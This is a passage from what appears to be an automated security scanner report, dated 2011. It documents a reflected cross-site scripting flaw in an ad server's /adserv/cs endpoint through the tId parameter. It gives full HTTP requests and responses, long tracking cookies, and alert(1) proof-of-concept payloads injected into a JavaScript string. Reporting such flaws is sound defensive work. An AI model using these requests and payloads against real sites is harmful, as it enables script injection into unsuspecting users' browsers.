1bw3r1bw3q1bw3p1bw3n1bw3m1bw3l1bw3k1bw3f1bw3e1bw3c1bw3b1bw3a1bw381bw361bw351bw341bw331bw321bw311bw301bw2z1bw2w1bw2v1bw2u1bw2t1bw2s1bw2r1bw2q1bw2p1bw2o1bw2n1bw2m1bw2l1bw2k1bw2j1bw2i1bw2c1bw2b1boph4u0e31202259612595p32te12021xgde1xg0o38c912012707l4jaec12021udrn1ucve3sti120326v3926uvg26uuv0s018raevpblc12011xh931p028VgwGdHhN1101254098BreszClF110v254102540z2540y2540x2540w2540u2540t2540s2540r2540q2540p2540n2540m2540l2540h2540g2540f2540d2540c2540b2540a254062540525404254032540225401253zz253zy253zx253yz1o018EstvP2qn112s1oa941oa931oa921oa911oa8z1oa8v1oa8u1oa8t1oa8s1oa8q1oa8p1oa8o1oa8n1oa8m1oa8l1oa8j1oa8i1oa8h1oa8g1oa8f1oa8e1oa8d1oa8c1oa8b1oa891oa881oa871oa841oa831oa821oa811oa801oa7y1oa7x1oa7w1oa7v1oa7u1oa7t1oa7s1oa7o1oa7n1oa7l1oa7k1oa7j1oa7i1oa7h1oa7g1oa7f1oa7e1oa7d1oa7b1oa7a1oa791oa781oa771oa761oa751oa741oa731oa721oa701oa6z1oa6y1oa6x1oa6w1oa6v1oa6u1oa6t1oa6o1oa6n1oa6m1oa6l1oa6k1oa6j1oa6h1oa6g1oa6f1oa6e1oa691oa681oa651oa641oa631oa611oa601oa5z1oa5y1oa5w1oa5v1oa5t1oa5s1oa5r1oa5q1oa5m1oa5l1oa5k1oa5j1oa5i1oa5h1o9ct; adh="1lf17qo16033e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; clid=2lebnns011706ch47d7o8wtv274ys01x1709070v214; orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; rdrlst=4330ojdlggtq20000000b170911gvlggtq20000000b17090yujlginvd0000000817080jv3lginvd0000000817080e0flggrmr0000000c17090x1blebnns1wj3q01411000yielginvd0000000817080yiflginvd0000000817080oj6lggtq20000000b17090e08lggtq20000000b170910qflginvq0000000717070e0nlgevbm0000000e17090w3clebnns1wj3q01411000jv6lebnns1wj3q01411000jv5lggtq20000000b17090j4ilew2e20000001r17090khalggtq20000000b17091196lfzx0l0000001417091195lg7rdq0000000v17090jillebnns1wj3q01411001194lg3y5y0000001117090z14lggtq20000000b17090zgdlggtq20000000b17090faalggtq20000000b17090z13lgio080000000217021193lgiiin0000000917091192lg5l2h0000001017090jprlginvd0000000817080w2klggtq20000000b17090yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001t17090mmnlebnns1wj3q01411000xwhlggtq20000000b17091004lginvd0000000817080z02lggtq20000000b17090kbzlggtq20000000b17090eh5lf17qf0000001p17090kkclggtq20000000b170906bylemlne0000001v17090df5lgcqt50000000j1709111xlggtq20000000b17090mn2lginvd0000000817080mn1lginvd0000000817080swvlggtq20000000b1709100plggtq20000000b17090im3lgcqt50000000j17090yzglginxj0000000517050b6mlf17qk0000001o17090y63lg93og0000000o17090xvslebnns1wj3q01411000o5alggtq20000000b17090yyxlginvu0000000617060yywlginzk0000000317030x1jlebnns1wj3q01411000xwclginvd0000000817080o4plginvd0000000817080yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000b17090yyelginyj0000000417040fullf8gij0000001l170910f6lg1nei00000013170900c9lfk1rn0000001i17090y7blg94wv0000000m17090jsalggtq20000000b170906pklginvd0000000817080cajlfk1rn0000001i17090p7vlebnns1xgc001b120010tylg60ji0000000w170910ellg1nei07gla00h120010eklggtq20000000b17090xuklebnns2219101x170911k3lginvd00000008170810telg60j60000000y170910e9lg1nei0000001317090xtblggtq20000000b170910e2lggtq20000000b17090mivlgismk0000000117010yw4lggtq20000000b170910e4lginvd00000008170810e5lg1nei00000013170910rdlg1vir087mk01217090xt3lggtq20000000b17090mzklgcsh70000000h17090agalggtq20000000b17090agblggtq20000000b17090mzqlgcsgy0000000i17090loxlginvd00000008170807gmlebnns1wj3q01411000kfalginvd0000000817080xthlebnns1xgc001b12000xtflggtq20000000b17090za2lginvd0000000817080za1lginvd00000008170807gqlggtq20000000b17090ovwlginvd0000000817080lw4lginvd0000000817080fuqlegh2b0000001w17090lw3lggtq20000000b17090l24lginvd0000000817080mz1lebnns1wj3q01411000l25lggtq20000000b170907vglfk1rn0tn5601i17090jk7lebnns1wj3q01411000cbnlfk1rn0tn5601i17090e11lggwth0000000a1709; sglst=21k0s8dtlggrmr01w8m00c1709070c20c8kmlggrmr01w8m00c1709070c20cavtlggrmr0056q00c1709070c20c82hlebnns1ucve00z10000600200avjlggrmr01w8m00c1709070c20c3kilggrmr01w8m00c1709070c20calhlggrmr01w8m00c1709070c20c9bslggrmr01w8m00c1709070c20cab4lebnns2707l01x1709070v21481zlggrmr0056q00c1709070c20c8gxlggrmr0056q00c1709070c20c81ylginvd00000008170807082088gwlginvd0000000817080708208aoklggrmr0056q00c1709070c20caollginvd0000000817080708208b07lggwth01r1w00a1709070a20a7inlginvd00000008170807082088nclginvd0000000817080708208b05lggrmr01w8m00c1709070c20cal1lggrmr01w8m00c1709070c20cbbhlggrmr01w8m00c1709070c20c8wylginvd0000000817080708208b0clfjpei0yygv01j1709070v2148wxlggrmr0056q00c1709070c20c72slggtq201ywi00b1709070b20bahhlginvd00000008170807082088nblggrmr0056q00c1709070c20cahilggrmr0056q00c1709070c20c7gdlgcqt5061tf00j1709070j20jb08lfjpei0yygv01b1700070020040ulggrmr01w8m00c1709070c20caprlggrmr01w8m00c1709070c20c5l4lgcqt5061tf00j1709070j20jaanlebnns1xg0o00o120007002008aelggrmr0056q00c1709070c20c61hlggrmr01w8m00c1709070c20c5b0lf17qo0000001n1709070v214ag2leqh191sblb01u1709070v2143thlggrmr01w8m00c1709070c20c8c9lggrmr0056q00c1709070c20c9z4lggrmr01w8m00c1709070c20cacjlggrmr01w8m00c1709070c20cb1alfjpei0yygv01j1709070v2149mmlggrmr0056q00c1709070c20cb0nlggrmr01w8m00c1709070c20cb0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00c1709070c20c0tllegh2b22bk901w1709070v2149cblggrmr0056q00c1709070c20c8bglginvd00000008170807082084wmlggrmr01w8m00c1709070c20c5q8lebnns1ucve00k10000600200acelggrmr01w8m00c1709070c20c45mlfdxmc0000001k1709070v214bhdlginvd0000000817080708208

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16043w0t012e301OdygJLiOt01jvdw3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv29fgs01y18010801215; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Set-Cookie: orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Set-Cookie: rdrlst=43311gvlggtq20000000c18010ojdlggtq20000000c18010yujlginvd0000000918010x1blebnns1wj3q01411000e0flggrmr0000000d18010jv3lginvd0000000918010yielginvd0000000918010yiflginvd0000000918010oj6lggtq20000000c18010e08lggtq20000000c180110qflginvq0000000818010w3clebnns1wj3q01411000e0nlgevbm0000000f18010jv6lebnns1wj3q01411000jv5lggtq20000000c18010j4ilew2e20000001s18010khalggtq20000000c18011196lfzx0l0000001518011195lg7rdq0000000w18010jillebnns1wj3q01411001194lg3y5y0000001218010z14lggtq20000000c18010zgdlggtq20000000c18010faalggtq20000000c18010z13lgio080000000318011193lgiiin0000000a18011192lg5l2h0000001118010jprlginvd0000000918010w2klggtq20000000c18010yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001u18010mmnlebnns1wj3q01411000xwhlggtq20000000c18011004lginvd0000000918010z02lggtq20000000c18010kbzlggtq20000000c18010kkclggtq20000000c18010eh5lf17qf0000001q180106bylemlne0000001w18010df5lgcqt50000000k1801111xlggtq20000000c18010mn2lginvd0000000918010mn1lginvd0000000918010swvlggtq20000000c1801100plggtq20000000c18010im3lgcqt50000000k18010yzglginxj0000000618010b6mlf17qk0000001p18010y63lg93og0000000p18010xvslebnns1wj3q01411000o5alggtq20000000c18010yyxlginvu0000000718010yywlginzk0000000418010x1jlebnns1wj3q01411000xwclginvd0000000918010o4plginvd0000000918010yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000c18010yyelginyj0000000518010fullf8gij0000001m180110f6lg1nei00000014180100c9lfk1rn0000001j18010y7blg94wv0000000n18010jsalggtq20000000c180106pklginvd0000000918010cajlfk1rn0000001j18010p7vlebnns1xgc001b120010tylg60ji0000000x180110ellg1nei07gla00h120010eklggtq20000000c18010xuklebnns2219101y180111k3lginvd00000009180110telg60j60000000z180110e9lg1nei0000001418010xtblggtq20000000c180110e2lggtq20000000c18010mivlgismk0000000218010yw4lggtq20000000c180110e4lginvd00000009180110e5lg1nei00000014180110rdlg1vir087mk01318010xt3lggtq20000000c18010mzklgcsh70000000i18010agalggtq20000000c18010agblggtq20000000c18010mzqlgcsgy0000000j18010loxlginvd00000009180107gmlebnns1wj3q01411000kfalginvd0000000918010xthlebnns1xgc001b12000xtflggtq20000000c18010za2lginvd0000000918010za1lginvd0000000918010ovwlginvd00000009180107gqlggtq20000000c18010lw4lginvd0000000918010fuqlegh2b0000001x18010lw3lggtq20000000c18010mz1lebnns1wj3q01411000l24lginvd0000000918010l25lggtq20000000c180107vglfk1rn0tn5601j18010jk7lebnns1wj3q01411000cbnlfk1rn0tn5601j18010e11lggwth0000000b1801; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Set-Cookie: sglst=21l0s8dtlggrmr01w8m00d1801080120d8kmlggrmr01w8m00d1801080120davtlggrmr0056q00d1801080120d82hlebnns1ucve00z10000600200avjlggrmr01w8m00d1801080120d3kilggrmr01w8m00d1801080120dalhlggrmr01w8m00d1801080120d9bslggrmr01w8m00d1801080120dab4lebnns2707l01y1801080121581zlggrmr0056q00d1801080120d8gxlggrmr0056q00d1801080120d81ylginvd00000009180108012098gwlginvd0000000918010801209aoklggrmr0056q00d1801080120daollginvd0000000918010801209b07lggwth01r1w00b1801080120b8nclginvd00000009180108012097inlginvd0000000918010801209b05lggrmr01w8m00d1801080120dal1lggrmr01w8m00d1801080120d8wylginvd0000000918010801209bbhlggrmr01w8m00d1801080120d8wxlggrmr0056q00d1801080120db0clfjpei0yygv01k1801080121572slggtq2049ei00c1801080120cahhlginvd00000009180108012098nblggrmr0056q00d1801080120dahilggrmr0056q00d1801080120d7gdlgcqt508cbf00k1801080120kb08lfjpei0yygv01b1700070020040ulggrmr01w8m00d1801080120daprlggrmr01w8m00d1801080120d5l4lgcqt508cbf00k1801080120kaanlebnns1xg0o00o120007002008aelggrmr0056q00d1801080120d61hlggrmr01w8m00d1801080120d5b0lf17qo0000001o18010801215ag2leqh191um3b01v180108012153thlggrmr01w8m00d1801080120d8c9lggrmr0056q00d1801080120d9z4lggrmr01w8m00d1801080120dacjlggrmr01w8m00d1801080120db1alfjpei0yygv01k180108012159mmlggrmr0056q00d1801080120db0nlggrmr01w8m00d1801080120db0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00d1801080120d4zqlgl34k00000001180108012019cblggrmr0056q00d1801080120d0tllegh2b24m2901x180108012155q8lebnns1ucve00k100006002004wmlggrmr01w8m00d1801080120d8bglginvd0000000918010801209acelggrmr01w8m00d1801080120d45mlfdxmc0000001l18010801215bhdlginvd0000000918010801209; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 14 Feb 2011 01:36:19 GMT
Content-Length: 830

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=4071663510365101|cId=3210|cb=1297647330|notifyPort=8080|exId=19|tId=4071
...[SNIP]...
br.net?anId=40&pubId=3099&advId=27355&campId=2946&vURL=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&fdefb"-alert(1)-"6a122e04d38=1";
</script>
...[SNIP]...

1.47. http://ad.media6degrees.com/adserv/cs [tId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The value of the tId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37aa2"-alert(1)-"5ae84f10ba7 was submitted in the tId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserv/cs?tId=4071663510365101|cb=1297647330|adType=iframe|cId=3210|ec=1|spId=27355|advId=971|exId=19|price=0.3381000030040741|pubId=562|secId=194|invId=3099|notifyServer=asd147.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html37aa2"-alert(1)-"5ae84f10ba7 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://i.dailymail.co.uk/adTest/mpu-dm.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt12707lxzt12707lxzt12707lxzt12707l; vstcnt=3lebnns051l064e206123s185k81848g1848f1848e1848d1848c1848b1848a18488184871848618485184841848218481184801847z1847y1847x1847v1847u1847t1847s1847r1847q1847p1847o1847k1847i1847h1847g1847f1847e1847d1847c1847b1847a18479184781847418472184711846v1846u1846t1846s1846r1846q1846p1846o1846l1846k1846j1846i1846b1846a18469184621845y1845x1845w1845v1845t1845s1845r1845q1845p1845o1845n1845m1845k1845j1845i1845h1845g1845f1845e1845d1845c1845b1845a1845818457184561845518454184531844z1844y1844w1844v1844u1844t1844s1844r1844q1844p1844n1844m1844l1844k1844j1844h1844g1844f1844e1844d1844c1844a1843w1843v1843u1843t1843s1843r1843p1843o1843n1843m1843k1843j1843h1843g1843f1843d1843c184371843518434184301842z1842y1842x1842u1842t181qq4qbzj120a1yfnu1yfnt1yfnq1yfnp1yfno1yfnn1yfnm1yfnl1yfi41yfhj4e2p3120t237p8237p7237p6237p4237ou237os237oq237op237oo237on237om237ol237oi237oh237og237of237oe237oc237ob237o6237o5237o4237o3237o2237o1237o0237ny237nv237nu4fhux122m0d1tf0d1te0d1tc0d1tb0d1ta0d1t90d1t80d1t70d1t50d1t40d1t30d1t20d1t00d1sz0d1su0d1st0d1ss0d1sr0d1sq0d1so0d1sn0d1sm0d1sk0d1sj0d1si0d1se0d1sd0d1sc0d1s70d1s40d1s20d1s10d1s00d1rw0d1ru0d1rt0d1rs0d1rr0d1rq0d1rp0d1ro0d1rm0d1rl0d1rk0d1rj0d1rh0d1rg0d1rf0d1rd0d1rc0d1rb0d1r90d1r80d1r70d1r60d1r40d1r30d1r20d1r10d1r00d1qz0d1qx0d1qw0d1qv0d1qu0d1qo0d1qm0d1ql0d1qj0d1qi0d1qh0d1qg0d1qe0d1qc0d1qb0d1qa0d1q60d1q50d1q40d1q20d1q10d1py0d1px0d1pw0d1pv0d1pu0d1ps0d1pr0d1pq0d1pm0d1pl0axzm00000000004esx7120104tej49wpz120r1w3r41w3r01w3qz1w3qy1w3qx1w3qv1w3qu1w3qr1w3qq1w3qo1w3qm1w3ql1w3qi1w3qh1w3qg1w3qf1w3qe1w3qb1w3qa1w3q91w3q81w3q71w3q61w3q41w3q31w3pz1w3py0r073ik5120o0pk2n0kh4b0kh4a0kh490kh430kh3z0kh3y0kh3x0kh3v0kh3u0kh3t0kh3s0kh3r0kh3p0kh3m0kh3l0kh3j0kh3h0kh3g0kh3f0kh3d0kh3a0kh390keqa4nssk122m1c4wn1bw5j1bw5i1bw5g1bw5f1bw5e1bw5d1bw5b1bw5a1bw591bw561bw551bw541bw531bw521bw511bw501bw4z1bw4y1bw4x1bw4w1bw4u1bw4t1bw4s1bw4r1bw4q1bw4p1bw4o1bw4n1bw4l1bw4j1bw4i1bw4h1bw4g1bw4f1bw4e1bw4c1bw4b1bw4a1bw491bw481bw471bw461bw451bw441bw431bw421bw401bw3z1bw3x1bw3w1bw3v1bw3u1bw3t1bw3s1bw3r1bw3q1bw3p1bw3n1bw3m1bw3l1bw3k1bw3f1bw3e1bw3c1bw3b1bw3a1bw381bw361bw351bw341bw331bw321bw311bw301bw2z1bw2w1bw2v1bw2u1bw2t1bw2s1bw2r1bw2q1bw2p1bw2o1bw2n1bw2m1bw2l1bw2k1bw2j1bw2i1bw2c1bw2b1boph4u0e31202259612595p32te12021xgde1xg0o38c912012707l4jaec12021udrn1ucve3sti120326v3926uvg26uuv0s018raevpblc12011xh931p028VgwGdHhN1101254098BreszClF110v254102540z2540y2540x2540w2540u2540t2540s2540r2540q2540p2540n2540m2540l2540h2540g2540f2540d2540c2540b2540a254062540525404254032540225401253zz253zy253zx253yz1o018EstvP2qn112s1oa941oa931oa921oa911oa8z1oa8v1oa8u1oa8t1oa8s1oa8q1oa8p1oa8o1oa8n1oa8m1oa8l1oa8j1oa8i1oa8h1oa8g1oa8f1oa8e1oa8d1oa8c1oa8b1oa891oa881oa871oa841oa831oa821oa811oa801oa7y1oa7x1oa7w1oa7v1oa7u1oa7t1oa7s1oa7o1oa7n1oa7l1oa7k1oa7j1oa7i1oa7h1oa7g1oa7f1oa7e1oa7d1oa7b1oa7a1oa791oa781oa771oa761oa751oa741oa731oa721oa701oa6z1oa6y1oa6x1oa6w1oa6v1oa6u1oa6t1oa6o1oa6n1oa6m1oa6l1oa6k1oa6j1oa6h1oa6g1oa6f1oa6e1oa691oa681oa651oa641oa631oa611oa601oa5z1oa5y1oa5w1oa5v1oa5t1oa5s1oa5r1oa5q1oa5m1oa5l1oa5k1oa5j1oa5i1oa5h1o9ct; adh="1lf17qo16033e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; clid=2lebnns011706ch47d7o8wtv274ys01x1709070v214; orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; rdrlst=4330ojdlggtq20000000b170911gvlggtq20000000b17090yujlginvd0000000817080jv3lginvd0000000817080e0flggrmr0000000c17090x1blebnns1wj3q01411000yielginvd0000000817080yiflginvd0000000817080oj6lggtq20000000b17090e08lggtq20000000b170910qflginvq0000000717070e0nlgevbm0000000e17090w3clebnns1wj3q01411000jv6lebnns1wj3q01411000jv5lggtq20000000b17090j4ilew2e20000001r17090khalggtq20000000b17091196lfzx0l0000001417091195lg7rdq0000000v17090jillebnns1wj3q01411001194lg3y5y0000001117090z14lggtq20000000b17090zgdlggtq20000000b17090faalggtq20000000b17090z13lgio080000000217021193lgiiin0000000917091192lg5l2h0000001017090jprlginvd0000000817080w2klggtq20000000b17090yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001t17090mmnlebnns1wj3q01411000xwhlggtq20000000b17091004lginvd0000000817080z02lggtq20000000b17090kbzlggtq20000000b17090eh5lf17qf0000001p17090kkclggtq20000000b170906bylemlne0000001v17090df5lgcqt50000000j1709111xlggtq20000000b17090mn2lginvd0000000817080mn1lginvd0000000817080swvlggtq20000000b1709100plggtq20000000b17090im3lgcqt50000000j17090yzglginxj0000000517050b6mlf17qk0000001o17090y63lg93og0000000o17090xvslebnns1wj3q01411000o5alggtq20000000b17090yyxlginvu0000000617060yywlginzk0000000317030x1jlebnns1wj3q01411000xwclginvd0000000817080o4plginvd0000000817080yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000b17090yyelginyj0000000417040fullf8gij0000001l170910f6lg1nei00000013170900c9lfk1rn0000001i17090y7blg94wv0000000m17090jsalggtq20000000b170906pklginvd0000000817080cajlfk1rn0000001i17090p7vlebnns1xgc001b120010tylg60ji0000000w170910ellg1nei07gla00h120010eklggtq20000000b17090xuklebnns2219101x170911k3lginvd00000008170810telg60j60000000y170910e9lg1nei0000001317090xtblggtq20000000b170910e2lggtq20000000b17090mivlgismk0000000117010yw4lggtq20000000b170910e4lginvd00000008170810e5lg1nei00000013170910rdlg1vir087mk01217090xt3lggtq20000000b17090mzklgcsh70000000h17090agalggtq20000000b17090agblggtq20000000b17090mzqlgcsgy0000000i17090loxlginvd00000008170807gmlebnns1wj3q01411000kfalginvd0000000817080xthlebnns1xgc001b12000xtflggtq20000000b17090za2lginvd0000000817080za1lginvd00000008170807gqlggtq20000000b17090ovwlginvd0000000817080lw4lginvd0000000817080fuqlegh2b0000001w17090lw3lggtq20000000b17090l24lginvd0000000817080mz1lebnns1wj3q01411000l25lggtq20000000b170907vglfk1rn0tn5601i17090jk7lebnns1wj3q01411000cbnlfk1rn0tn5601i17090e11lggwth0000000a1709; sglst=21k0s8dtlggrmr01w8m00c1709070c20c8kmlggrmr01w8m00c1709070c20cavtlggrmr0056q00c1709070c20c82hlebnns1ucve00z10000600200avjlggrmr01w8m00c1709070c20c3kilggrmr01w8m00c1709070c20calhlggrmr01w8m00c1709070c20c9bslggrmr01w8m00c1709070c20cab4lebnns2707l01x1709070v21481zlggrmr0056q00c1709070c20c8gxlggrmr0056q00c1709070c20c81ylginvd00000008170807082088gwlginvd0000000817080708208aoklggrmr0056q00c1709070c20caollginvd0000000817080708208b07lggwth01r1w00a1709070a20a7inlginvd00000008170807082088nclginvd0000000817080708208b05lggrmr01w8m00c1709070c20cal1lggrmr01w8m00c1709070c20cbbhlggrmr01w8m00c1709070c20c8wylginvd0000000817080708208b0clfjpei0yygv01j1709070v2148wxlggrmr0056q00c1709070c20c72slggtq201ywi00b1709070b20bahhlginvd00000008170807082088nblggrmr0056q00c1709070c20cahilggrmr0056q00c1709070c20c7gdlgcqt5061tf00j1709070j20jb08lfjpei0yygv01b1700070020040ulggrmr01w8m00c1709070c20caprlggrmr01w8m00c1709070c20c5l4lgcqt5061tf00j1709070j20jaanlebnns1xg0o00o120007002008aelggrmr0056q00c1709070c20c61hlggrmr01w8m00c1709070c20c5b0lf17qo0000001n1709070v214ag2leqh191sblb01u1709070v2143thlggrmr01w8m00c1709070c20c8c9lggrmr0056q00c1709070c20c9z4lggrmr01w8m00c1709070c20cacjlggrmr01w8m00c1709070c20cb1alfjpei0yygv01j1709070v2149mmlggrmr0056q00c1709070c20cb0nlggrmr01w8m00c1709070c20cb0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00c1709070c20c0tllegh2b22bk901w1709070v2149cblggrmr0056q00c1709070c20c8bglginvd00000008170807082084wmlggrmr01w8m00c1709070c20c5q8lebnns1ucve00k10000600200acelggrmr01w8m00c1709070c20c45mlfdxmc0000001k1709070v214bhdlginvd0000000817080708208

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16043w0t012e301OdygJLiOt01jvdp3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv29fgl01y18010801215; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Set-Cookie: orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Set-Cookie: rdrlst=43311gvlggtq20000000c18010ojdlggtq20000000c18010yujlginvd0000000918010x1blebnns1wj3q01411000e0flggrmr0000000d18010jv3lginvd0000000918010yielginvd0000000918010yiflginvd0000000918010oj6lggtq20000000c18010e08lggtq20000000c180110qflginvq0000000818010w3clebnns1wj3q01411000e0nlgevbm0000000f18010jv6lebnns1wj3q01411000jv5lggtq20000000c18010j4ilew2e20000001s18010khalggtq20000000c18011196lfzx0l0000001518011195lg7rdq0000000w18010jillebnns1wj3q01411001194lg3y5y0000001218010z14lggtq20000000c18010zgdlggtq20000000c18010faalggtq20000000c18010z13lgio080000000318011193lgiiin0000000a18011192lg5l2h0000001118010jprlginvd0000000918010w2klggtq20000000c18010yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001u18010mmnlebnns1wj3q01411000xwhlggtq20000000c18011004lginvd0000000918010z02lggtq20000000c18010kbzlggtq20000000c18010kkclggtq20000000c18010eh5lf17qf0000001q180106bylemlne0000001w18010df5lgcqt50000000k1801111xlggtq20000000c18010mn2lginvd0000000918010mn1lginvd0000000918010swvlggtq20000000c1801100plggtq20000000c18010im3lgcqt50000000k18010yzglginxj0000000618010b6mlf17qk0000001p18010y63lg93og0000000p18010xvslebnns1wj3q01411000o5alggtq20000000c18010yyxlginvu0000000718010yywlginzk0000000418010x1jlebnns1wj3q01411000xwclginvd0000000918010o4plginvd0000000918010yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000c18010yyelginyj0000000518010fullf8gij0000001m180110f6lg1nei00000014180100c9lfk1rn0000001j18010y7blg94wv0000000n18010jsalggtq20000000c180106pklginvd0000000918010cajlfk1rn0000001j18010p7vlebnns1xgc001b120010tylg60ji0000000x180110ellg1nei07gla00h120010eklggtq20000000c18010xuklebnns2219101y180111k3lginvd00000009180110telg60j60000000z180110e9lg1nei0000001418010xtblggtq20000000c180110e2lggtq20000000c18010mivlgismk0000000218010yw4lggtq20000000c180110e4lginvd00000009180110e5lg1nei00000014180110rdlg1vir087mk01318010xt3lggtq20000000c18010mzklgcsh70000000i18010agalggtq20000000c18010agblggtq20000000c18010mzqlgcsgy0000000j18010loxlginvd00000009180107gmlebnns1wj3q01411000kfalginvd0000000918010xthlebnns1xgc001b12000xtflggtq20000000c18010za2lginvd0000000918010za1lginvd0000000918010ovwlginvd00000009180107gqlggtq20000000c18010lw4lginvd0000000918010fuqlegh2b0000001x18010lw3lggtq20000000c18010mz1lebnns1wj3q01411000l24lginvd0000000918010l25lggtq20000000c180107vglfk1rn0tn5601j18010jk7lebnns1wj3q01411000cbnlfk1rn0tn5601j18010e11lggwth0000000b1801; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Set-Cookie: sglst=21l0s8dtlggrmr01w8m00d1801080120d8kmlggrmr01w8m00d1801080120davtlggrmr0056q00d1801080120d82hlebnns1ucve00z10000600200avjlggrmr01w8m00d1801080120d3kilggrmr01w8m00d1801080120dalhlggrmr01w8m00d1801080120d9bslggrmr01w8m00d1801080120dab4lebnns2707l01y1801080121581zlggrmr0056q00d1801080120d8gxlggrmr0056q00d1801080120d81ylginvd00000009180108012098gwlginvd0000000918010801209aoklggrmr0056q00d1801080120daollginvd0000000918010801209b07lggwth01r1w00b1801080120b8nclginvd00000009180108012097inlginvd0000000918010801209b05lggrmr01w8m00d1801080120dal1lggrmr01w8m00d1801080120d8wylginvd0000000918010801209bbhlggrmr01w8m00d1801080120d8wxlggrmr0056q00d1801080120db0clfjpei0yygv01k1801080121572slggtq2049eb00c1801080120cahhlginvd00000009180108012098nblggrmr0056q00d1801080120dahilggrmr0056q00d1801080120d7gdlgcqt508cb800k1801080120kb08lfjpei0yygv01b1700070020040ulggrmr01w8m00d1801080120daprlggrmr01w8m00d1801080120d5l4lgcqt508cb800k1801080120kaanlebnns1xg0o00o120007002008aelggrmr0056q00d1801080120d61hlggrmr01w8m00d1801080120d5b0lf17qo0000001o18010801215ag2leqh191um3401v180108012153thlggrmr01w8m00d1801080120d8c9lggrmr0056q00d1801080120d9z4lggrmr01w8m00d1801080120dacjlggrmr01w8m00d1801080120db1alfjpei0yygv01k180108012159mmlggrmr0056q00d1801080120db0nlggrmr01w8m00d1801080120db0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00d1801080120d4zqlgl34d00000001180108012019cblggrmr0056q00d1801080120d0tllegh2b24m2201x180108012155q8lebnns1ucve00k100006002004wmlggrmr01w8m00d1801080120d8bglginvd0000000918010801209acelggrmr01w8m00d1801080120d45mlfdxmc0000001l18010801215bhdlginvd0000000918010801209; 